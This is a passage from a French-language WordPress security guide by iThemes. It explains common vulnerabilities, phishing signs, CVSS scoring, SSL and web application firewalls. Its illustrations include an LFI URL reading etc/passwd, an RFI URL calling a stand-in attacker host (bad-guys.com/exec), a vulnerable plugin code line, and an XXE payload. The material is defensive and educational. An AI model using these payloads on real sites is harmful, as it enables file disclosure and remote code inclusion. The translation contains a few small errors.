Comment empêcher l'escalade de privilèges

iThemes Security Pro peut aider à protéger votre site Web contre le contrôle d'accès brisé en limitant l'accès administrateur à une liste d'appareils de confiance.

11. Vulnérabilité d'exécution de code à distance

Une vulnérabilité RCE ou Remote Code Execution permet à un attaquant d'accéder et d'apporter des modifications, voire de prendre le contrôle d'un ordinateur ou d'un serveur.

Exemple d'exécution de code à distance

En 2018, Microsoft a révélé une vulnérabilité d'exécution de code à distance trouvée dans Excel.

Un attaquant qui réussirait à exploiter la vulnérabilité pourrait exécuter du code arbitraire dans le contexte de l'utilisateur actuel. Si l'utilisateur actuel est connecté avec des droits d'administrateur, un attaquant pourrait prendre le contrôle du système affecté. Un attaquant pourrait alors installer des programmes ; afficher, modifier ou supprimer des données ; ou créez de nouveaux comptes avec des droits d'utilisateur complets. Les utilisateurs dont les comptes sont configurés pour avoir moins de droits d'utilisateur sur le système pourraient être moins impactés que les utilisateurs qui fonctionnent avec des droits d'utilisateur administratifs.

Comment empêcher l'exécution de code à distance

Le moyen le plus simple d'atténuer une vulnérabilité RCE consiste à valider l'entrée de l'utilisateur en filtrant et en supprimant tous les caractères indésirables.

Notre société mère, Liquid Web, a un excellent article sur la prévention de l'exécution de code à distance.

14. Vulnérabilité d'inclusion de fichiers

Une vulnérabilité d' inclusion de fichier se produit lorsqu'une application Web permet à l'utilisateur de soumettre des entrées dans des fichiers ou de télécharger des fichiers sur le serveur.

Il existe deux types de vulnérabilités d'inclusion de fichiers, locales et distantes.

15. Vulnérabilité d'inclusion de fichiers locaux

Une vulnérabilité LFI ou Local File Inclusion permet à un attaquant de lire et parfois d'exécuter des fichiers sur le serveur d'un site Web.

Exemple d'inclusion de fichier local

Jetons un autre coup d'œil à yourfavesite.com , où les chemins passés pour include instructions ne sont pas correctement filtrés. Par exemple, regardons l'URL ci-dessous.

 yourfavesite.com/module.php?file=example.file

Il est possible pour un attaquant de modifier le paramètre URL pour accéder à un fichier arbitraire sur le serveur.

 yourfavesite.com/module.php?file=etc/passwd

La modification de la valeur du fichier dans l'URL pourrait permettre à un attaquant d'afficher le contenu du fichier psswd.

Comment empêcher l'inclusion de fichiers locaux

Créez une liste autorisée de fichiers que la page peut inclure, puis utilisez un identifiant pour accéder au fichier sélectionné. Et bloquez ensuite toute requête contenant un identifiant invalide.

16. Vulnérabilité d'inclusion de fichiers distants

Une vulnérabilité RFI ou Remote File Inclusion permet à un attaquant d'inclure un fichier, en exploitant généralement un mécanisme d'« inclusion de fichier dynamique » implémenté dans l'application cible.

Exemple d'inclusion de fichier distant

Le plugin WordPress WP avec Spritz a été fermé sur le référentiel WordPress.org car il présentait une vulnérabilité RFI.

Vous trouverez ci-dessous le code source de la vulnérabilité :

 if(isset($_GET['url'])){ $content=file_get_contents($_GET['url']);

Le code peut être exploité en changeant la valeur de content.filter.php?url= value. Par exemple:

 yoursite.com//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://bad-guys.com/exec

Prévention d'inclusion de fichiers distants

Créez une liste autorisée de fichiers que la page peut inclure, puis utilisez un identifiant pour accéder au fichier sélectionné. Et bloquez ensuite toute requête contenant un identifiant invalide.

17. Vulnérabilité de traversée de répertoire

Une vulnérabilité Directory Traversal ou File Traversal permet à un attaquant de lire des fichiers arbitraires sur le serveur qui exécute une application.

Exemple de traversée de répertoire

Les versions 5.7 à 5.03 de WordPress étaient vulnérables aux attaques de traversée de répertoire car elles ne vérifiaient pas correctement les données d'entrée des utilisateurs. Un attaquant ayant accès à un compte avec au moins des privilèges d' author pourrait exploiter la vulnérabilité de traversée de répertoire et exécuter du code PHP malveillant sur le serveur sous-jacent, conduisant à une prise de contrôle à distance complète.

Comment empêcher la traversée de répertoire

Les développeurs peuvent utiliser des index plutôt que des portions réelles de noms de fichiers lors de la création de modèles ou de l'utilisation de fichiers de langue.

18. Vulnérabilité de redirection malveillante

Une vulnérabilité de redirection malveillante permet à un attaquant d'injecter du code pour rediriger les visiteurs du site vers un autre site Web.

Exemple de redirection malveillante

Imaginons que vous cherchiez un pull bleu à l'aide de l'outil de recherche d'une boutique en ligne.

Malheureusement, le serveur de la boutique ne parvient pas à encoder correctement les entrées des utilisateurs et un attaquant a pu injecter un script de redirection malveillant dans votre requête de recherche.

Ainsi, lorsque vous tapez pull bleu dans le champ de recherche de la boutique et appuyez sur Entrée, vous vous retrouvez sur la page Web de l'attaquant au lieu de la page de la boutique avec des pulls correspondant à la description de votre recherche.

Comment empêcher la redirection malveillante

Vous pouvez vous protéger contre les redirections malveillantes en désinfectant les entrées des utilisateurs, en validant les URL et en obtenant la confirmation des visiteurs pour toutes les redirections hors site.

19. Vulnérabilité des entités externes XML

Une vulnérabilité XXE ou XML External Entity permet à un attaquant de tromper un analyseur XML pour qu'il transmette des informations sensibles à une entité externe sous son contrôle.

Exemple d'entité externe XML

Un attaquant pourrait exploiter une vulnérabilité XXE pour accéder à des fichiers sensibles tels que etc/passwd, qui stocke les informations de compte utilisateur.

 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

Comment empêcher l'entité externe XML

Le meilleur moyen d'éviter XXE est d'utiliser des formats de données moins complexes tels que JSON et d'éviter la sérialisation des données sensibles.

20. Attaque par déni de service

Une attaque DoS ou déni de service est une tentative délibérée de rendre votre site Web ou votre application indisponible pour les utilisateurs en l'inondant de trafic réseau.

Dans une attaque par déni de service distribué DDoS , un attaquant utilise plusieurs sources pour inonder un réseau de trafic. Un attaquant détournera des groupes d'ordinateurs, de routeurs et d'appareils IoT infectés par des logiciels malveillants afin d'augmenter le flux de trafic.

Exemple d'attaque par déni de service

La plus grande attaque DDoS (Distributed Denial-of-Service) jamais lancée a été lancée contre AWS en février de cette année. Amazon a signalé qu'AWS Shield, son service géré de protection contre les menaces, a observé et atténué cette énorme attaque DDoS. L'attaque a duré 3 jours et a culminé à 2,3 téraoctets par seconde.

Comment empêcher les attaques par déni de service

Il existe 2 manières principales d'atténuer une attaque DoS.

1. Achetez plus d'hébergement que vous n'en avez besoin. Avoir des ressources supplémentaires à votre disposition peut vous aider à faire face à la demande accrue causée par une attaque DoS.
2. Utilisez un pare-feu au niveau du serveur comme Cloudflare. Un pare-feu peut détecter un pic de trafic inhabituel et empêcher la surcharge de votre site Web.

21. Journalisation des frappes

L' enregistrement des frappes , également connu sous le nom de keylogging ou capture de clavier, se produit lorsqu'un pirate surveille et enregistre secrètement les frappes des visiteurs du site Web.

Exemple d'enregistrement des frappes

En 2017, un pirate a installé avec succès du code JavaScript malveillant sur le serveur du fabricant de smartphones OnePlus.

À l'aide du code malveillant, les attaquants ont surveillé et enregistré les frappes des clients OnePlus au fur et à mesure qu'ils saisissaient les détails de leur carte de crédit. Les pirates ont enregistré et collecté les frappes de 40 000 clients avant que OnePlus ne détecte et corrige le piratage.

Comment empêcher l'enregistrement des frappes

Mettez tout à jour ! En règle générale, un attaquant devra exploiter une autre vulnérabilité existante pour injecter un enregistreur de frappe sur un ordinateur ou un serveur. Garder tout à jour avec les derniers correctifs de sécurité empêchera de donner aux pirates un moyen facile d'installer un enregistreur de frappe sur votre site Web ou votre ordinateur.

Bonus : Hameçonnage

Les vulnérabilités logicielles sont la seule chose que les pirates et les cybercriminels tentent d'exploiter. Les pirates ciblent et exploitent également les humains. L'hameçonnage est une méthode d'exploitation courante.

Qu'est-ce que l'hameçonnage ?

L'hameçonnage est une méthode de cyberattaque utilisant le courrier électronique, les médias sociaux, les messages texte et les appels téléphoniques pour amener la victime à divulguer des informations personnelles. L'attaquant utilisera ensuite les informations pour accéder à des comptes personnels ou commettre une fraude d'identité.

Comment repérer un e-mail de phishing

Comme nous l'avons appris plus tôt dans cet article, certaines vulnérabilités nécessitent un certain type d'interaction de l'utilisateur pour être exploitées. L'une des façons dont un pirate informatique incite les gens à participer à leurs efforts infâmes est d'envoyer des e-mails de phishing.

Apprendre à repérer un e-mail de phishing peut vous éviter de jouer par inadvertance avec les plans des cybercriminels.

4 astuces pour repérer un email de phishing :

1. Regardez l'adresse e-mail de l'expéditeur - Si vous recevez un e-mail d'une entreprise, la partie de l'adresse e-mail de l'expéditeur après le « @ » doit correspondre au nom de l'entreprise.
   
   Si un e-mail représente une entreprise ou une entité gouvernementale mais utilise une adresse e-mail publique telle que "@gmail", c'est le signe d'un e-mail de phishing.
   
   Gardez un œil sur les fautes d'orthographe subtiles du nom de domaine. Par exemple, regardons cette adresse e-mail [email protected] Nous pouvons voir que Netflix a un « x » supplémentaire à la fin. La faute d'orthographe est un signe clair que l'e-mail a été envoyé par un escroc et doit être supprimé immédiatement.
   
2. Recherchez les erreurs grammaticales – Un e-mail rempli d'erreurs grammaticales est le signe d'un e-mail malveillant. Tous les mots peuvent être orthographiés correctement, mais les phrases sont des mots manquants qui rendraient la phrase cohérente. Par exemple, « Votre compte a été piraté. Mettre à jour le mot de passe pour la sécurité du compte ».
   
   Tout le monde fait des erreurs, et tous les e-mails avec une faute de frappe ou deux ne sont pas une tentative de vous arnaquer. Cependant, plusieurs erreurs grammaticales justifient un examen plus approfondi avant de répondre.
   
3. Pièces jointes ou liens suspects – Il vaut la peine de faire une pause avant d'interagir avec les pièces jointes ou les liens inclus dans un e-mail.
   
   Si vous ne reconnaissez pas l'expéditeur d'un e-mail, vous ne devez pas télécharger les pièces jointes incluses dans l'e-mail car elles pourraient contenir des logiciels malveillants et infecter votre ordinateur. Si l'e-mail prétend provenir d'une entreprise, vous pouvez rechercher ses coordonnées sur Google pour vérifier que l'e-mail lui a été envoyé avant d'ouvrir les pièces jointes.
   
   Si un e-mail contient un lien, vous pouvez passer votre souris sur le lien pour vérifier que l'URL vous renvoie là où elle devrait être.
   
4. Méfiez-vous des demandes urgentes – Une astuce courante utilisée par les escrocs consiste à créer un sentiment d'urgence. Un e-mail malveillant peut créer un scénario nécessitant une action immédiate. Plus vous avez le temps de réfléchir, plus vous avez de chances d'identifier que la demande provient d'un escroc.
   
   Vous pouvez recevoir un e-mail de votre « patron » vous demandant de payer un fournisseur dès que possible ou de votre banque vous informant que votre compte a été piraté et qu'une action immédiate est requise.

Comment mesurer la gravité d'une vulnérabilité WordPress

Il existe plusieurs types de vulnérabilités WordPress, toutes avec des degrés de risque variables. Heureusement pour nous, la base de données nationale sur les vulnérabilités, un projet de l'Institut national des sciences et de la technologie, dispose d'un calculateur de système de notation de vulnérabilité pour déterminer le risque d'une vulnérabilité.

Cette section du guide des vulnérabilités WordPress couvrira les métriques et les niveaux de gravité du système de notation des vulnérabilités. Bien que cette section soit un peu plus technique, certains utilisateurs peuvent la trouver utile pour approfondir leur compréhension de la façon dont les vulnérabilités WordPress et leur gravité sont évaluées.

Métriques courantes du système de notation des vulnérabilités WordPress

L'équation du système de notation de vulnérabilité utilise trois ensembles de scores différents pour déterminer le score de gravité global.

1. Métriques de base

Le groupe de métriques de base représente les caractéristiques d'une vulnérabilité qui sont constantes dans les environnements utilisateur.

Les métriques de base sont divisées en deux groupes, l'exploitabilité et l'impact.

1.1. Métriques d'exploitabilité

Le score d'exploitabilité est basé sur la difficulté pour un attaquant de tirer parti de la vulnérabilité. Le score est calculé à l'aide de 5 variables différentes.

1.1.1. Vecteur d'attaque (AV)

Le score du vecteur d'attaque est basé sur la méthode d'exploitation de la vulnérabilité. Le score sera d'autant plus élevé qu'un attaquant peut être éloigné pour exploiter la vulnérabilité.

L'idée est que le nombre d'attaquants potentiels sera beaucoup plus important si la vulnérabilité peut être exploitée via un réseau par rapport à une vulnérabilité qui nécessite un accès physique à un exploit de périphérique.

Plus il y a d'attaquants potentiels, plus le risque d'exploitation est élevé et, par conséquent, le score de vecteur d'attaque attribué à la vulnérabilité sera plus élevé.

1.1.2. Complexité d'attaque (AC)

La valeur de complexité est basée sur les conditions requises pour exploiter la vulnérabilité. Certaines conditions peuvent nécessiter la collecte de plus d'informations sur la cible, la présence de certains paramètres de configuration système ou des exceptions de calcul.

Le score de complexité de l'attaque sera d'autant plus élevé que la complexité requise pour exploiter la vulnérabilité sera faible.

1.1.3. Privilèges requis (PR)

Le score des privilèges requis est calculé en fonction des privilèges qu'un attaquant doit obtenir avant d'exploiter une vulnérabilité. Nous y plongerons un peu plus dans la section Authentifié vs. Non authentifié.

Le score sera le plus élevé si aucun privilège n'est requis.

1.1.4. Interaction avec l'utilisateur (UI)

Le score d'interaction de l'utilisateur est déterminé en fonction du fait qu'une vulnérabilité nécessite ou non une interaction de l'utilisateur pour être exploitée.

Le score sera le plus élevé lorsqu'aucune interaction de l'utilisateur n'est requise pour qu'un attaquant exploite la vulnérabilité.

1.1.5. Portée

Le score de portée est basé sur une vulnérabilité dans un composant logiciel pour avoir un impact sur les ressources au-delà de sa portée de sécurité.

L'étendue de sécurité englobe d'autres composants qui fournissent des fonctionnalités uniquement à ce composant, même si ces autres composants ont leur propre autorité de sécurité.

Le score est le plus élevé lorsqu'un changement de portée se produit.

1.2. Mesures d'impact

Les métriques d'impact capturent les effets directs d'une vulnérabilité exploitée avec succès.

1.2.1. Impact confidentiel (C)

Ce score d'impact confidentiel mesure l'impact sur la confidentialité des informations gérées par les logiciels exploités.

Le score est le plus élevé lorsque la perte pour le logiciel impacté est la plus élevée.

1.2.2. Intégrité (I)

Ce score d'intégrité est basé sur l'impact sur l'intégrité d'une vulnérabilité exploitée avec succès.

Le score est le plus élevé lorsque la conséquence du logiciel impacté est la plus importante.

1.2.3. Disponibilité (A)

Le score de disponibilité est basé sur l'impact de la disponibilité du logiciel exploité.

Le score est le plus élevé lorsque la conséquence de la composante impactée est la plus importante.

Calcul du score de base CVSS

Le score de base est une fonction des équations des sous-scores d'impact et d'exploitabilité. Lorsque le score de base est défini comme,

 If (Impact sub score <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02] 15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

2. Métriques de score temporel

Les métriques temporelles mesurent l'état actuel des techniques d'exploitation, l'existence de correctifs ou de solutions de contournement, ou la confiance que l'on a dans la description d'une vulnérabilité.

Les mesures temporelles devraient changer et évolueront avec le temps.

2.1. Maturité du code d'exploitation (E)

La maturité du code d'exploitation est basée sur la probabilité que la vulnérabilité soit attaquée.

Plus une vulnérabilité peut être exploitée facilement, plus le score de vulnérabilité est élevé.

2.2. Niveau de remédiation (RL)

Le niveau de correction d'une vulnérabilité est un facteur important pour la hiérarchisation. Des solutions de contournement ou des correctifs peuvent offrir une correction provisoire jusqu'à ce qu'un correctif ou une mise à niveau officiel soit publié.

Moins un correctif est officiel et permanent, plus le score de vulnérabilité est élevé.

2.3. Rapport de confiance (RC)

La métrique de confiance du rapport mesure le niveau de confiance qu'une vulnérabilité existe et la crédibilité des détails techniques.

Plus une vulnérabilité est validée par le fournisseur ou d'autres sources réputées, plus le score est élevé.

Calcul du score CVSS temporel

Le score temporel est défini comme,

 Roundup(BaseScore v× ExploitCode Maturity × RemediationLevel × ReportConfidence)

3. Indicateurs de score environnemental

Les mesures environnementales permettent aux analystes de personnaliser le score CVSS en fonction de l'importance des actifs informatiques concernés.

Les métriques d'exploitabilité et d'impact sur l'environnement sont un équivalent modifié des métriques de base et se voient attribuer des valeurs en fonction du placement des composants de l'infrastructure organisationnelle. Consultez les sections Métriques de base ci-dessus pour afficher les valeurs et les descriptions des métriques d'exploitabilité et d'impact.

Les métriques environnementales contiennent un groupe supplémentaire, les modificateurs de sous-score d'impact.

3.1. Métriques des modificateurs de sous-score d'impact

Les métriques des modificateurs de sous-score d'impact évaluent les exigences de sécurité spécifiques pour la confidentialité (CR), l'intégrité (IR) et la disponibilité (AR), permettant d'affiner le score environnemental en fonction de l'environnement des utilisateurs.

Calcul du score CVSS environnemental

Le score environnemental est défini comme,

 If (Modified Impact Sub score <= 0) 0 else, If Modified Scope is Unchanged Round up(Round up (Minimum [ (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) If Modified Scope is Changed Round up(Round up (Minimum [1.08 × (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) And the modified Impact sub score is defined as, If Modified Scope is Unchanged 6.42 × [ISC Modified ] If Modified Scope is Changed 7.52 × [ISC Modified - 0.029]-3.25× [ISC Modified × 0.9731 - 0.02] 13 Where, ISC Modified = Minimum [[1 - (1 - M.IConf × CR) × (1 - M.IInteg × IR) × (1 - M.IAvail × AR)], 0.915] The Modified Exploitability sub score is, 8.22 × M.AttackVector × M.AttackComplexity × M.PrivilegeRequired × M.UserInteraction 4 Where “Round up” is defined as the smallest number, specified to one decimal place, that is equal to or higher than its input. For example, Round up (4.02) is 4.1; and Round up (4.00) is 4.0.

Score global CVSS et gravité

Le système global de notation de vulnérabilité commune ou score CVSS est une représentation des scores de base, temporels et environnementaux.

Le score CVSS global peut être utilisé pour vous donner une idée de la gravité ou de la gravité d'une vulnérabilité.

Exemple d'évaluation de la gravité CVSS dans le monde réel

Dans notre résumé des vulnérabilités de décembre 2020, nous avons signalé une vulnérabilité dans le plugin Easy WP SMTP. La vulnérabilité zero-day (nous couvrirons les vulnérabilités zero-day dans la section suivante) permettait à un attaquant de prendre le contrôle d'un compte administrateur et était exploitée à l'état sauvage.

En regardant l'entrée de la base de données nationale sur les vulnérabilités, nous pouvons trouver le degré de gravité de la vulnérabilité WP SMTP.

Décomposons quelques éléments de la capture d'écran WP SMTP NVDB ci-dessus.

Score de base : le score de base est de 7,5, ce qui nous indique que le niveau de gravité de la vulnérabilité est élevé.

Vecteur : Le vecteur nous indique que le score est basé sur les équations de vulnérabilité CVSS 3.1 et les métriques utilisées pour calculer le score.

Voici la partie métrique du vecteur.

 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Utilisons maintenant les valeurs et les descriptions de la métrique de base du début de cet article pour comprendre les huit valeurs métriques du vecteur.

1. AV:N – Cela signifie que le vecteur d'attaque (AV) de la vulnérabilité est le réseau (N). En d'autres termes, un attaquant n'a besoin que d'un accès réseau pour exploiter la vulnérabilité.
2. AC:L – La complexité d'attaque (AC) de la vulnérabilité est faible (L). En d'autres termes, n'importe quel script kiddie peut exploiter la vulnérabilité.
3. PR:N – Les privilèges requis (PR) nécessaires pour exploiter la vulnérabilité sont Aucun (N). Ainsi, la vulnérabilité ne nécessite pas un utilisateur authentifié pour être exploitée. (Nous couvrirons la différence entre les vulnérabilités authentifiées et non authentifiées plus loin dans cet article.)
4. UI:N – L'interaction utilisateur (UI) requise pour exploiter cette vulnérabilité est None (N). Ainsi, l'attaquant a les moyens d'exploiter la vulnérabilité par lui-même.
5. S:U – Cela signifie que la portée (S) de la vulnérabilité est inchangée (U). Dans le cas de cette vulnérabilité, le composant vulnérable et le composant impacté sont les mêmes.
6. C:H – L'impact sur la confidentialité (C) de la vulnérabilité est élevé (H). Lorsque cette vulnérabilité est exploitée, il en résulte une perte totale de confidentialité.
7. I:N – L'impact sur l'intégrité (I) de cette vulnérabilité est Aucun (N). Lorsque la vulnérabilité est exploitée, il n'y a pas de perte d'intégrité ou de fiabilité des informations vulnérables.
8. A:N – Cela signifie que l'impact sur la disponibilité (A) est Aucun (N). Lorsque la vulnérabilité est exploitée, il n'y aura aucun impact sur la disponibilité de votre site Web.

Le score CVSS peut nous aider à déterminer la gravité et la portée d'une vulnérabilité donnée. Dans les deux prochaines sections, nous couvrirons certains termes de vulnérabilité importants qui sont souvent inclus dans les divulgations de vulnérabilité.

Emballer

Dans cette section, nous avons appris plusieurs éléments importants de la sécurité WordPress, y compris les motivations des pirates, les différents types de piratage, les vulnérabilités exploitées par les criminels en ligne, comment atténuer le risque de vulnérabilité et comment déterminer le risque qu'une vulnérabilité pose sur votre site Internet.

Comprendre comment les attaquants tentent de pirater nos sites Web et leur objectif après avoir violé nos sites Web nous permet de mettre en place les défenses appropriées.

Dans les sections à venir, vous apprendrez comment vous pouvez protéger votre site Web contre presque tous les types d'attaques qu'un pirate informatique peut vous lancer.

Section 4 : Sécurisation de votre serveur

La première étape de votre stratégie de sécurité WordPress consiste à sécuriser votre serveur. Votre serveur stocke tous les fichiers et le code qui font fonctionner votre site Web.

Dans cette section, vous apprendrez :

1. L'importance de choisir un bon hôte.
2. Comment crypter les communications sur votre site Web.
3. Comment un pare-feu peut aider à sécuriser votre site.

Choisissez le bon hébergement

Tous les hébergeurs Web ne sont pas créés égaux et en choisir un uniquement en fonction du prix peut finir par vous coûter beaucoup plus cher à long terme avec les problèmes de sécurité de WordPress. La plupart des environnements d'hébergement partagé sont sécurisés, mais certains ne séparent pas de manière adéquate les comptes d'utilisateurs.

Votre hébergeur doit être vigilant quant à l'application des derniers correctifs de sécurité et au respect des autres bonnes pratiques de sécurité WordPress d'hébergement importantes liées à la sécurité des serveurs et des fichiers. Votre hébergeur doit être vigilant quant à l'application des derniers correctifs de sécurité et suivre d'autres bonnes pratiques de sécurité d'hébergement importantes liées à la sécurité des serveurs et des fichiers.

Crypter votre site WordPress avec SSL

Secure Sockets Layer, également connu sous le nom de SSL, est une technologie de sécurité qui fournit un cryptage entre un client et un serveur Web. Pour comprendre cela un peu plus simplement, un « client » est un navigateur Web comme Chrome ou Safari, et un « serveur Web » est votre site Web ou votre boutique en ligne.

Un moyen simple de savoir si le site Web que vous visitez dispose d'un certificat SSL est de regarder dans la barre d'adresse de votre navigateur pour voir si l'URL commence par HTTP ou HTTPS. Si l'URL commence par un HTTPS, vous naviguez en toute sécurité sur un site utilisant SSL.

Pourquoi SSL est-il si important ?

Ne pas avoir de certificat SSL en 2021 coûte cher. Pourquoi? Si vous n'avez pas activé SSL sur votre site Web, il sera plus difficile pour les clients potentiels de découvrir votre existence, et ceux qui trouvent votre site peuvent avoir peur de vous donner de l'argent.

Chaque fois que nous effectuons un achat en ligne, une communication s'établit entre votre navigateur et la boutique en ligne. Par exemple, lorsque nous saisissons notre numéro de carte de crédit dans notre navigateur, notre navigateur partagera le numéro avec la boutique en ligne. Une fois que le magasin a reçu le paiement, il indique à votre navigateur de vous informer que votre achat a été effectué avec succès.

Une chose à garder à l'esprit concernant les informations partagées entre notre navigateur et le serveur du magasin est que les informations font plusieurs arrêts pendant le transit. SSL fournit un cryptage à la communication pour garantir que notre carte de crédit n'est pas vue jusqu'à ce qu'elle atteigne la destination finale du serveur du magasin.

Pour mieux comprendre le fonctionnement du cryptage, réfléchissez à la manière dont nos achats sont livrés. Si vous avez déjà suivi l'état de livraison d'un achat en ligne, vous auriez vu que votre commande a fait plusieurs arrêts avant d'arriver à votre domicile. Si le vendeur n'a pas correctement emballé votre achat, il serait facile pour les gens de voir ce que vous avez acheté.

SSL est un outil crucial pour empêcher les personnes malveillantes d'intercepter des informations sensibles telles que les mots de passe et les numéros de carte de crédit qui sont partagés entre le client et le serveur Web.

Pourquoi un certificat SSL est-il indispensable pour chaque site Web ?

Les avantages de sécurité WordPress que vous tirez d'avoir un certificat SSL sur votre site Web sont suffisants pour en faire un incontournable pour tout site Web. Cependant, pour encourager tout le monde à protéger les visiteurs de leur site, les navigateurs Web et les moteurs de recherche ont créé des incitations négatives pour encourager tout le monde à utiliser SSL. Dans cette section, nous couvrirons les conséquences coûteuses de la non-activation de SSL sur votre site Web.

1. Ne pas avoir SSL activé nuira à votre classement SEO

L'optimisation des moteurs de recherche ou SEO est le processus d'optimisation de votre site Web pour qu'il soit découvert de manière organique via les pages de résultats des moteurs de recherche. L'avantage du référencement est qu'il s'agit d'un excellent moyen pour vous d'augmenter le trafic organique et non rémunéré de votre site. Si vous vendez un cours de cuisson du pain, vous voulez que votre site Web soit sur la première page de résultats pour quelqu'un qui recherche sur Google, ou Duck Duck Go pour un cours de cuisson du pain.

Sans SSL activé sur votre site, les moteurs de recherche vous pénaliseront et déclasseront votre classement. L'une des mesures que Google utilise pour classer les sites Web dans leurs résultats de recherche est la fiabilité. Il est dans le meilleur intérêt de Google de ne pas envoyer ses utilisateurs vers des sites Web dangereux, la fiabilité est donc fortement pondérée dans leur algorithme de classement. Avec SSL qui ajoute tant de sécurité, c'est une partie importante de la façon dont Google évalue la fiabilité d'un site Web.

2. Les navigateurs marquent les sites non SSL comme non sécurisés

Une autre façon de ne pas activer SSL vous coûtera cher, c'est que le navigateur de votre visiteur les avertira que votre site n'est pas sécurisé. Comme nous l'avons mentionné précédemment, après avoir installé un certificat SSL sur votre site Web, l'URL de votre site changera de http ://votresite.com en https: //votresite/com. Chrome, par exemple, marquera les pages Web cryptées HTTPS comme sécurisées avec un cadenas verrouillé. Alternativement, Chrome remplacera le cadenas verrouillé pour toutes les pages Web non cryptées HTTP par le texte Not Secure .

Je n'achèterai pas sur des sites Web marqués comme non sécurisés par mon navigateur, et je ne suis pas le seul à ne pas le faire. Selon une étude de GlobalSign, 85 % des acheteurs en ligne évitent les sites Web non sécurisés. Gardez à l'esprit qu'en 2021, il est essentiel que tous vos sites utilisent HTTPS et pas seulement vos pages de connexion et de paiement. Un client potentiel peut ne pas passer à la caisse sécurisée si les pages de la boutique sont marquées comme non sécurisées par son navigateur Web.

3. Vous pouvez perdre des clients potentiels

Protéger vos clients est la raison essentielle pour activer SSL sur votre site Web. S'ils sont prêts à vous confier leur entreprise, le moins que vous puissiez faire est de récompenser cette confiance en les protégeant avec la puissance du cryptage.

Si un pirate informatique peut voler les détails de la carte de crédit de votre client en raison de l'absence de cryptage sur votre site Web, vous perdrez non seulement sa confiance, mais vous perdrez également toute partie de ses affaires futures.

Comment puis-je savoir si mon site Web a activé SSL ?

Un moyen simple de savoir si votre site Web dispose d'un certificat SSL est de regarder dans la barre d'adresse de votre navigateur pour voir si l'URL commence par HTTP ou HTTPS. Si l'URL commence par un HTTPS, votre site Web est sécurisé avec SSL.

Vous pouvez également utiliser un vérificateur SSL comme SSL Labs. Un vérificateur SSL analysera votre site à la recherche d'un certificat SSL et vous informera de l'expiration de votre certificat SSL.

Comment puis-je installer un certificat SSL sur mon site Web WordPress ?

Si votre site Web WordPress ne contient pas de SSL, la première chose à faire est de demander à votre fournisseur d'hébergement de voir s'il fournit un certificat SSL et une configuration gratuits. En 2021, la plupart des hébergeurs incluent SSL dans leurs packs d'hébergement. Par exemple, iThemes Hosting fournit et gère SSL pour chaque site Web.

Si votre hébergeur ne vous fournit pas de certificat SSL gratuit, ne vous inquiétez pas, il existe encore de nombreuses autres options.

Cloudflare propose un certificat SSL partagé gratuit pour les sites Web WordPress. Si vous préférez ne pas avoir de certificat SSL partagé et que vous êtes à l'aise avec la ligne de commande, CertBot est une excellente option. Certbot crée non seulement un certificat SSL gratuit en utilisant Let's Encrypt pour vous, mais il gérera également automatiquement le renouvellement du certificat pour vous.

Avoir SSL activé sur votre site WordPress est un must en 2021. SSL sécurise la communication entre vous et vos clients, améliore votre référencement et donne aux visiteurs de votre site l'assurance qu'ils sont en sécurité lorsqu'ils naviguent sur votre site Web.

Utiliser un pare-feu d'application Web

L'utilisation d'un pare-feu d'application Web est un excellent moyen d'ajouter une autre couche de protection à votre site Web WordPress.

Qu'est-ce qu'un pare-feu applicatif Web ?

Un WAF ou pare-feu d'application Web permet de sécuriser votre site Web en surveillant le trafic Internet dirigé vers votre site Web avant qu'il n'atteigne votre site Web.

En ajoutant un WAF devant WordPress, vous ajoutez un point de contrôle de sécurité entre Internet et votre site Web. Avant que le trafic puisse accéder à votre site Web, il doit passer par le WAF.

Si le WAF détecte un trafic malveillant, tel que CSRF, XSS, injections SQL, etc., il le filtrera avant qu'il n'atteigne votre site Web. Non seulement cela, mais un WAF peut aider à détecter une attaque DDoS et à mettre en œuvre une limitation du débit pour empêcher votre site Web de planter.

Les 3 façons de mettre en œuvre un WAF

Il existe 3 façons différentes de mettre en œuvre un WAF. Jetons un coup d'œil aux avantages et aux inconvénients de chaque type.

1. WAF basé sur le réseau - Un WAF basé sur le réseau ou physique est basé sur le matériel. Le principal avantage d'un WAF basé sur le réseau est la faible latence qui vient d'être installée localement. Cependant, l'inconvénient vient du prix du stockage et de l'entretien du matériel physique. Le prix et les exigences de stockage physique en font un mauvais choix pour la plupart des gens.
2. WAF basé sur l' hôte - Un WAF basé sur l' hôte ou local est intégré à WordPress, généralement à l'aide d'un plugin. L'avantage d'un WAF basé sur l'hôte est qu'il est moins cher qu'un WAF basé sur le réseau. L'inconvénient d'un WAF local réside dans les exigences des ressources de votre serveur. Et avec le filtrage du trafic qui se produit sur votre site Web, cela peut entraîner des temps de chargement de page plus lents pour les visiteurs de votre site Web.
3. WAF basé sur le cloud – Un WAF basé sur le cloud est généralement la meilleure option pour la plupart des gens. L'avantage d'un WAF basé sur le cloud est qu'il est abordable et qu'il ne vous oblige pas à le gérer. De plus, le trafic étant filtré avant qu'il n'atteigne votre site Web, il n'épuisera pas les ressources de votre serveur et ne ralentira pas votre site Web. Cloudflare et Sucuri sont des fournisseurs de pare-feu populaires basés sur le cloud.

Emballer

Dans cette section, nous avons appris pourquoi il est si important de choisir le bon hébergeur, comment sécuriser la communication entre notre site Web et ses visiteurs, et comment un WAF peut aider à empêcher le trafic malveillant d'atteindre notre site Web.

Dans la section à venir, vous apprendrez les meilleures pratiques pour sécuriser votre logiciel WordPress.

Section 5 : Sécurité du logiciel WordPress

